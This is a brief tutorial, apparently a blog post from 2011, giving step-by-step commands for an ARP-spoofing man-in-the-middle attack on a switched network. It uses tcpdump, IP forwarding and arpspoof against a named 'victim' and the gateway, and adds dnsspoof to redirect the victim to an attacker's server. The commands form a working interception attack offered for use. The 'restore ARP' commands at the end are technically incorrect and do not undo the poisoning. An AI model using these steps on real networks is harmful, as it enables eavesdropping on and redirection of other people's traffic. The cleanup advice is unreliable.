Active Sniffing – arpspoof

13 05 2011

Passive sniffing was very powerful on hub-based networks in the old days, but it is impractical on a switched network. To hear what others say on this kind of network, active sniffing is one of the options.

1. Your victim’s IP and the IP of the gateway.
2. The sniffing machine has to be on the same network segment as the victim.
3. BackTrack or related tools

0. Run any packet sniffer tool such as Wireshark or tcpdump
#tcpdump -i eth0 -w capture1.pcap
1. Allow your machine to forward IP packets
#echo 1 > /proc/sys/net/ipv4/ip_forward
2. Tell the victim that you are the gateway.
#arpspoof -i eth0 -t [target's IP] [gateway IP]
3. Tell the gateway that you are the victim.
#arpspoof -i eth0 -t [gateway IP] [target's IP]
4. You can extend the attack further from here. For example, you might want to perform a DNS poisoning attack in order to redirect your victim to the attacker’s server.
#dnsspoof -i eth0 -f [hostfile]

After you have got what you want, you should restore the accurate ARP data so that the network returns to its normal state.
#arpspoof -i eth0 -t [target's IP] [Your IP]
#arpspoof -i eth0 -t [gateway IP] [Your IP]
#echo 0 > /proc/sys/net/ipv4/ip_forward

Finally, analyse your captured packet file and see what you got.


